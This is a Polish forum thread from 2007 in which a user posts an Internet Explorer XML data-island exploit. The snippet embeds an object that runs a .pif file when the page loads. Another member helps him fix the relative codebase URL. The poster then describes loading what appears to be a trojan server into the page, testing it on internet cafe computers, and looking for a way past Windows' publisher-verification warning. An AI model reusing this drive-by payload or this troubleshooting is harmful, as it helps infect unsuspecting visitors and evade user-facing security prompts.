Pokaż wyniki 1 do 7 z 7

Temat: Problem.

  1. #1
    Zarejestrowany
    Nov 2007
    Postów
    35

    Question Problem.

    Witam! Małe pytanie. Jest to czysto teoretyczne i edukacyjne. Załóżmy, że zrobiłem sobie elegancką strone. I umieściłem w niej to:

    <P align=center>&nbsp;</P><SPAN dataFld=exploit dataFormatAs=html
    dataSrc=#oExec></SPAN><xml id=oExec> <security> <exploit>
    <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="index_pliki/serwer.pif "></object&g t; ]]>
    </exploit> </security> </xml></BODY></HTML>

    jak miałem stronke na kompie i był tam calc.exe to odpalało normalnie. Teraz (gdy jest na serwerze) jednak nie działa. Czy może mieć tu wpływ rozszerzenie pif? jakas rada?

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    codebase podaje relatywny url - dlatego nie dziala
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #3
    Zarejestrowany
    Nov 2007
    Postów
    35

    Domyślnie

    Dzieki wielkie Tqm

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    hmmm w sumie to zalezy jeszcze od przegladarki...
    jak otwierasz z lokalnego dysku ten html to rodzaj URLa to file:// a przez neta to bedzie http:// ale z drugiej strony... jakby podac samo 'calc.exe' to moze zalapie :P ale to musialaby byc wybitnie skopana przegladarka - normalnie kazda bedzie szukac http://domena.tld/sciezka/do/strony/calc.exe
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  5. #5
    Zarejestrowany
    Nov 2007
    Postów
    35

    Domyślnie

    Jest tak że jak miałem na dysku strone i było tam wpisane C:\blabla\calc.exe to działało a jak załadowałem na serwer to juz kalkuta nie odpaliło. Spróbowałem wpisać właśnie index_pliki/serwer pif juz z gnojkiem wrzuconym i poszedłem przetestpwać do miejscowej kafejki i dupa, a tam nie mają ani firewala ani antyvira ani antyspyware żadnego. Poświęciłem u siebie spróbować i też lipa.

    Udało sie. Wpisałem URL http:\\bla bla bla, ale znowu schody. Windows mi blokuje kalkulator bo pisze że nie moze wydawcy zweryfikować. Co zrobić z tym szajsem?
    Ostatnio edytowane przez Marcus123 : 12-06-2007 - 00:00

  6. #6
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Marcus, jaka masz przegladarke?
    Myslalem ze takie rzeczy to tylko w starym zwiędniętym IE 5.0..
    http://gogulas.yoyo.pl/h.gif

  7. #7
    Zarejestrowany
    Nov 2007
    Postów
    35

    Domyślnie

    IE 6.0. gogulas ale chodzi o to co wyskakuje czy o ten kod co dałem wyżej?

    Chłopaki pomocy. Co zrobić z tym cholernym okienkiem. google juz całe chyba przeszukałem aż mnie łeb od kompa boli. Jak stronke spreparować odpowiednio
    Ostatnio edytowane przez Marcus123 : 12-06-2007 - 14:40

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj